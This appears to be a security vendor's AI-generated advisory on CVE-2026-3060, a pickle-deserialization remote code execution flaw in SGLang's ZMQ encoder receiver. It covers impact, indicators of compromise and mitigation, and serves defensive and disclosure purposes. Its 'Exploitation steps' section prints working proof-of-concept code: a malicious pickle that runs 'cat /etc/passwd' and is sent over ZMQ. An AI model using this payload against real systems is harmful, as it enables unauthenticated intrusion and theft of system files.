CVE-2026-3060: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-3060 is a critical unauthenticated remote code execution (RCE) vulnerability in SGLang's encoder parallel disaggregation module (encode_receiver.py). The flaw arises from the use of Python's pickle.loads() to deserialize untrusted data received over an unauthenticated ZeroMQ (ZMQ) TCP socket. It affects SGLang versions 0.5.5 through 0.5.9 (all versions with the disaggregation feature enabled). The vulnerability was discovered by Igor Stepansky of Orca Security on 2026-02-04, coordinated through CERT/CC (case VU#665416), and publicly disclosed on 2026-03-11/12. It carries a CVSS v3.1 base score of 9.8 (Critical) (Orca Security, Red Hat CVE).

Technical details

The root cause is CWE-502 (Deserialization of Untrusted Data): the disaggregation encoder receiver in encode_receiver.py binds a ZMQ PULL socket to tcp://* (all network interfaces) and calls pickle.loads() directly on any received bytes without authentication, authorization, or input validation. Python's pickle protocol encodes arbitrary object reconstruction instructions — including calls to os.system, subprocess.Popen, or eval — via the __reduce__ method, making any pickle.loads() on attacker-controlled data equivalent to remote code execution. The attack requires only network access to the exposed ZMQ broker TCP port (default: HTTP port + 1); no credentials, API keys, or user interaction are needed. The vulnerability is part of a broader systemic pattern of unsafe pickle usage across SGLang's codebase (20+ instances), and is closely related to CVE-2026-3059 (multimodal generation ZMQ broker) and CVE-2026-3989 (crash dump replay script) (Orca Security, CERT/CC).

Impact

Successful exploitation grants an unauthenticated remote attacker full code execution with the privileges of the SGLang process, resulting in complete confidentiality, integrity, and availability compromise of the affected system. In typical production deployments — Kubernetes pods, Docker containers, or dedicated GPU nodes — this could expose LLM model weights, inference data, API credentials, and GPU workloads. The compromised SGLang instance can also serve as a pivot point for lateral movement into the surrounding cluster or cloud environment. The feature must be explicitly enabled (--encoder-transfer-backend zmq_to_scheduler); default text-only SGLang deployments are not affected (Orca Security).

Exploitability

Functional proof-of-concept (PoC) code for CVE-2026-3060 was developed by Orca Security and shared with CERT/CC during coordinated disclosure; the exploit is a single ZMQ message containing a crafted pickle payload and requires minimal attacker skill given the trivial nature of pickle deserialization exploits. No in-the-wild exploitation has been observed as of publication. The vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.0066 (low probability of near-term exploitation), though the trivial exploit mechanics and lack of authentication lower the practical barrier significantly (Orca Security, Feedly).

Exploitation steps

  1. Reconnaissance: Identify SGLang deployments running with the disaggregation feature enabled (--encoder-transfer-backend zmq_to_scheduler). Scan for open ZMQ TCP ports — the default broker port is the HTTP port + 1 (e.g., port 30001 if HTTP is on 30000). Tools like Shodan, Censys, or nmap can identify exposed ports.
  2. Craft malicious pickle payload: Create a Python class with a __reduce__ method that returns a callable (e.g., os.system) and the desired command as arguments:
import os, pickle
class RCEPayload:
    def __init__(self, cmd): self.cmd = cmd
    def __reduce__(self): return (os.system, (self.cmd,))
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
  1. Connect to the ZMQ broker: Using a ZMQ REQ or PUSH socket, connect to the target's exposed broker port:
import zmq
ctx = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect(f"tcp://{target_ip}:{broker_port}")
  1. Send the payload: Transmit the serialized pickle payload as a raw ZMQ message:
sock.send(payload)
  1. Achieve code execution: The SGLang disaggregation module calls pickle.loads() on the received bytes, triggering execution of the attacker's command with the full privileges of the SGLang process — no response or further interaction required (Orca Security).

Indicators of compromise

  • Network: Unexpected inbound TCP connections to the ZMQ broker port (default: SGLang HTTP port + 1, e.g., 30001) from external or untrusted source IPs; ZMTP handshake traffic on non-standard ports; outbound connections from the SGLang process to unknown external destinations.
  • Process: Unusual child processes spawned by the SGLang Python process, such as /bin/sh, /bin/bash, curl, wget, nc, or python; unexpected process trees originating from the SGLang service account.
  • File System: New or modified files in /tmp/, the SGLang installation directory, or crash dump folders created by the SGLang process; presence of reverse shell scripts or web shells in unexpected locations.
  • Logs: SGLang application logs showing ZMQ receive events followed by unexpected errors or exceptions unrelated to normal inference workloads; OS-level audit logs recording unusual execve calls from the SGLang process (Orca Security).

Mitigation and workarounds

A patch was merged into SGLang's main branch on 2026-03-27 (PR #20904) and included in the v0.5.10 release, which binds ZMQ sockets to localhost by default (preventing remote exploitation) and replaces unsafe pickle.loads() with a SafeUnpickler for CVE-2026-3989; follow-up work targets msgpack-based serialization for CVE-2026-3059/3060. Immediate actions: (1) Upgrade to SGLang v0.5.10 or later. (2) If upgrading is not immediately possible, use firewall rules to restrict access to the ZMQ broker port (HTTP port + 1) to localhost or known trusted internal clients only. (3) Disable the disaggregation feature (--encoder-transfer-backend zmq_to_scheduler) if not required. (4) Ensure SGLang is not deployed with broker ports exposed to untrusted networks or the public internet (SGLang v0.5.10 Release, SGLang PR #20904).

Community reactions

The vulnerability was discovered by Igor Stepansky (Orca Security) and coordinated through CERT/CC (VU#665416); notably, the SGLang maintainers did not respond to multiple disclosure attempts via GitHub Security Advisories and direct email — including CISA outreach — during the 45-day coordination window, prompting public disclosure without an official vendor statement (Orca Security). After public disclosure, community contributors (notably zwang86) submitted a fix within days, which was merged on 2026-03-27. A collaborator (kpham-sgl) noted that SafeUnpickler is bypassable and advocated for msgpack or HMAC-based serialization as a more robust long-term solution (SGLang PR #20904). The vulnerability received coverage from The Hacker News, SecurityOnline, SAPInsider, and Fortbridge, with commentary highlighting the systemic risk of pickle deserialization across the Python AI/ML ecosystem (The Hacker News, SecurityOnline).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management